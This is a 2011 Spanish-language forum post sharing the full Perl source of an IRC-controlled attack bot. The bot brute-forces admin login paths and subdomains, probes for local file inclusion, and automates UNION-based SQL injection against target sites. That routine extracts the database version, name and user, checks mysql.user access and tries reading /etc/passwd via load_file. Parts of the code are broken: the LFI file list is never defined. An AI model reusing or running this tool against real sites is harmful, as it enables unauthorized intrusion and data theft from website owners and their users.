[Perl] Terr0r B0t By Doddy H

Iniciado por BigBear, 7 Octubre 2011, 15:55 PM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Hola a todos.

Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :

* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI  (busca numero de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal


!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='


Forma de uso :


C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online




Código (perl) [Seleccionar]
#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#





use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;



@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");


print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );

if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}


print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
chomp($log);

if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

sub lfi {
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}


sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}

sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) {
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}



sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}

sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub tomax {
return $nave->request (GET $_[0]);
}

#The End